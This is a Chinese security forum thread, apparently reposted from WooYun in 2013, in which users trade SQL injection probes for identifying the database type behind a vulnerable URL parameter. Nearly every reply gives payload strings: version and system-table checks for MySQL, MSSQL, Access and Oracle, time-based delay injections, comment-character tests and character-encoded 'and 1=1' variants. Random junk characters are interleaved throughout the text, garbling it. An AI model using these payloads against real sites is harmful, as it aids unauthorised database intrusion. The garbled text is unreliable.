一个注射点如何最快速确认是什么类型数据库
3 ~1 E# B# B6 c+ h% z7 p( i9 e4 mxsser (十根阳具有长短!!) | 2013-02-05 12:36% i/ F5 p6 v7 k( E3 o% y) ?
假设这么一个注射点:2 T# N, _( B8 c8 t% `. H
show.html?id=2. U3 |( c7 C" F x& g2 j
mysql:id=2 and version()>0' Z8 V' b. {- u% E2 X
oracle:id=2 and '1'||'1'='113 S t4 m" e! [7 |' B- E
其他的欢迎补充6 @. Y& P1 C" b3 ^9 |2 b: B
1#
+ b, X# [0 Z' A+ h8 Y9 \upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
" T) N4 w) L8 N5 QAccess:' b! Q; I8 e* S* q1 k' P+ N
aNd aSc(cHr(97))=97
7 J& |. p" T3 \4 I& a5 _and exists(select id from MSysAccessObjects)' B+ e! Z5 Y8 ^5 q
SQL Server:
9 N8 u I. X' U0 nand exists(select id from sysobjects)( D7 f: Z9 r4 N) x" ?' l- |
and length(user)>0
: N) k; e4 Z3 i$ ?" X. `MySQL:& `$ Q: N7 R5 E4 ]3 r
and length(user())>08 o. v2 I9 V; B9 i4 u: u! J6 Q
2#% R' \ Q1 f1 P, h7 Y5 n
xsser (十根阳具有长短!!) | 2013-02-05 12:484 T" @4 u" ?( {/ Y s9 j
@upload 如果这些都不是呢…' k" i4 c( G( M$ E" ?( }6 ~" [
3#
% i' R. G7 W* B0 v& s4 b& G8 r: Vupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:035 _! Y$ D* T: I1 S3 t
@xsser 不快速的,延时注入
: \3 Y+ [) I- U$ q; }不知道这样写对不对+ ^. P Z! x+ `5 A+ d' U
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
$ i5 R) `# q4 u; w. g/ y5 wmysql:id=2 and select benchmark(1e8,current_date());3 x6 h6 k$ w# d4 ]
4#
* D& A: B$ m9 w2 q. Bupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
+ m; H# I6 m% i8 J( d2 Q4 Y1 ]$ Y最快的貌似是看报错信息
8 j+ `( e P8 q$ ^oracle error
3 { o1 {+ }7 L8 Y' v3 Xmssql error
4 e; Z- x% l( a+ ?* v1 wmysql error0 W' ~. j- v; ?1 E" ^0 _& X, g
5#
. z3 L! p) v n0 R' ?Nimda (你们都是坏银~) | 2013-02-05 13:14( q* i1 y3 a' B: B
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)/ m7 `, P" B1 y' c2 E
6#
1 I+ C$ b/ u3 Vupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
- P) W4 ^+ ]9 G# z5 b% L“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:7 B0 [5 w" \1 G3 I. I8 U# X) q
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符: ^5 b" ^6 R+ U$ C% J! N
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
5 V) L* F! |4 B& `5 S! \7#
/ M; h- {) Y$ h5 J_Evil (HackEnd) | 2013-02-05 13:339 P5 p# M3 H8 {6 [4 e
PostgreSQL. \, {! Y% J! H9 v+ J, |: n! ^9 ?
8#: i" Q8 C* e# d: T
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42( F, D( v" }0 \' U+ B( t2 E' @1 f+ q
切换编码 and 1=1 w; U- ~, \3 {2 X
oracle: w3 M& ~7 P( @0 \6 B7 G/ n
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
9 U# J$ ~& M- x0 Qmssql:
& n g9 @* X- Q3 sCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
" A7 _# D* P( H; P7 N/ V: _3 ^mysql:8 S3 G; }) _* x, i: N; r& t! ^
CHAR(97, 110, 100, 32, 49, 61, 49)
2 ?5 e5 J0 k* m3 X) m& A9#8 o' b2 k! z; d/ E* A* F4 Q. w
xsser (十根阳具有长短!!) | 2013-02-05 14:311 H6 K# G* ?8 A. c+ v
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?) [ n2 E' s; t w* [0 X
10#0 P, `$ Q- w! H6 S# G* K% R
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
: r. H6 t. V' U& W& j# n: q@xsser 是奇葩数据库类型的么?
7 H# A' t1 Y# Z7 ~根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
2 ?- a7 s4 C, n+ G" \2 B) U1.是否可以使用特定的函数来判断,该数据库特有的* m3 B, F5 w w
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等1 f I3 O" W7 n0 K# l% V1 a
3.是否可以编码查询
. p# P6 T) B$ C- r/ q1 A. e4.是否显可以利用错信息
9 W! p( q; F) {9 F' s( I7 ~5.是否存在数据库某些特性辅助判断) g% D9 b- g' W2 v( ]0 O) Q$ O
个人见解; A1 u* i5 c0 z: u
11#$ ~( }+ E; }! T n( n* c
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
/ N! n [ F, ^) W b+ y) {" d已收藏,mssql可以直接看到错误提示的吧~
2 m8 j5 ]+ u) i2 \12#
E* X8 ^# B7 cPasser_by | 2013-02-05 15:09
% Y) O" N5 |- J J( U: _曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。9 t) e5 K& n1 q% U/ g
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对